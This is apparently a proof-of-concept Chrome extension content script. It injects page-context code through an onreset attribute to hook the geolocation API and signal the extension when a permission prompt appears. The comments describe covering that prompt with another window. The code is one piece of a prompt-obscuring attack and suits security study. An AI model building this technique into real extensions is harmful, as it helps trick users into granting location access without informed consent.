// Content.js
// This content.js file is running with "run_at": "document_start" so it
// injects the Dom before the rest of the code
console.log("content.js");

// Called when the permission is gonna show up on the screen (example Geolocation with navigation)
// We could make this hook better, for example, monitoring the PermissionStatus.state and use when is
// equal 'prompt'
document.addEventListener('hooked', function(e) {
    chrome.runtime.sendMessage({ message: "obscured" }, () => {});
});

// Note: This method assumes there are no other global event listeners that handle the `reset` event but could use any global event
// We are running this before the rest of the code so we can overwrite the existing behavior when the
//   permissions (here is only demonstrating the geolocation permission example) is prompted
// To make it better we could place it directly on PermissionStatus.state of the permissions functions overwriting or another approaches to know the exact time the function was called
//   and place a new window above when the user is prompted with the permission
var actualCode = 'const newNavigator = navigator; navigator.geolocation.getCurrentPosition = (s, f) => { console.log("Injected"); document.dispatchEvent(new CustomEvent("hooked")); console.log("Dispatched"); return newNavigator.geolocation.watchPosition(s, f)}';
document.documentElement.setAttribute('onreset', actualCode);
document.documentElement.dispatchEvent(new CustomEvent('reset'));
document.documentElement.removeAttribute('onreset');